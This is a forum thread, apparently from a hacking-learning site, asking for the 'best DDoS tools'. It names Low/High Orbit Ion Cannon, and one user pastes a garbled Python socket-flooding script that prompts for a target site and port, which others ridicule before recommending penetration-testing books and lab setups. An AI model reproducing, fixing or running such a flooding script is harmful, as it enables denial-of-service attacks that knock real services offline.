Best DDoS Tools?


low/high orbit ion cannon is popular - however I hear stories of Noobs using it and getting prosecuted and heavy fines ($$)

maniac [VladimirVam]
11 years ago | edited 11 years ago


human1 : A skiddie detected .

human2 : Affirmative !

11 years ago


I have never DDOs’d , and i dont plan to , but i found this, but cant get it to run , maybe someone could tell me what im doin wrong ?


import time
import socket
import os
import sys
import string


def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
curdir = os.getcwd()


print (“DDoS mode loaded”)
host=raw_input( “Site you want to DDoS:” )
port=input( “Port you want to attack:” )
message=raw_input( “Input the message you want to send:” )
conn=input( “How many connections you want to make:” )
ip = socket.gethostbyname( host )
print (“[” + ip + “]”)
print ( “[Ip is locked]” )
print ( “[Attacking ” + host + “]” )
print (“+—————————-+”)
def dos():

pid = os.fork()

ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ddos.connect((host, 80))
ddos.send( message )
ddos.sendto( message, (ip, port) )
ddos.send( message );
except socket.error, msg:
print(“|[Connection Failed] |”)
print ( “|[DDoS Attack Engaged] |”)
for i in range(1, conn):
print (“+—————————-+”)
print(“The connections you requested had finished”)
if name == “main”:
answer = raw_input(“Do you want to ddos more?”)
if answer.strip() in “y Y yes Yes YES”.split():


maniac [VladimirVam]
11 years ago | edited 11 years ago


human1 : Another skiddie detected .

human2 : Affirmative !

11 years ago


lol , i am not a great programmer, i saw this ddos script and was wondering how i works , because i want t learn

maniac [VladimirVam]
11 years ago



well , not being a great programmer is pretty much the problem . you have to be an experienced programmer to understand and read someone else’s code , and maybe also customize it to ur needs in the future .
but what you are asking is this ==> ./exploit_name var1 var2 etc…
and thats what skiddies' dreams is all about , it wont help you much .

my advice : start reading books that will lead you to the real world .

11 years ago


I am reading books that will lead me into the “real world ” lol, i know some c++ and php , a little bit of javascript, and upon your skiddie comment decided to learn more , expand my knowledge , i understand the variables and functions , the problem is it wont run , but , ive decided to delete it, do research , write my own ddos (if i ever need it ),

maniac [VladimirVam]
11 years ago | edited 11 years ago


if you are really interested , i’d love to help


[] metasploit the penetration tester’s guide <== very very important book , start with it .
] <=== if you ever think of metasploit developing , read the important basic chapters ,
why ruby ?? cuz metasploit is all written in ruby which also is easy and very powerful .
[] CEH-Official-Certified <=== kinda useful , but its real use is getting the CEH certificate by passing their exam which costs about 500$ (not sure) , read it last .
] Hacking : the Art of Exploitation <===== a great book , gives you the whole picture and also very practical and easy to follow.

[*] you don’t have to read a book for assembly , cuz all of them will be talking alot about computer hardware design stuff that u really don’t need much(waste of time), so you need to read a good tutorial to learn assembly for linux and windows ( my advice : go for NASM ) , and after you get to know assembly basics and practiced them well , go read a tutorial about assembly shell coding .
Google is your friend ;)

PS : assembly can be a little tricky at the start .

one last tip : you have to set up your penetration testing environment , and by that i mean a pc having the BackTrack 5 installed on it and the other (which is the target) having xp or linux , the setup for the target pc XP is guided in metasploit book in the last chapter (configuring your target machines) , start off with xp as a target tho . ofc you have to connect them with a network , duuuh ^^

if you faced trouble pm me on e-mail :

*********** [ADIGA]
11 years ago


If you want my advice, do not waste your time reading books, you know the basics of c++ and php as you said, just set your mind on a thing to code and start with it, when you get stuck google: “how to ****** c++/php”.

It may not be the best way to get things done, but you will find a lot of methods used to get what you want done, read the code, find the best approach, this will expand the way you think about coding/programming.

11 years ago


Than you VladimirVam and ADIGA, i don’t think reading books is ever a waste of time , althou google is handy source. I will start with metasploit the penetration tester’s guide immediately ( if i can find a copy) , never thought i would go as far as learning assembly , but i read a little about it today , and can see why … thanks I’ve learned so much already since I’ve signed up on HACKTHIS :)

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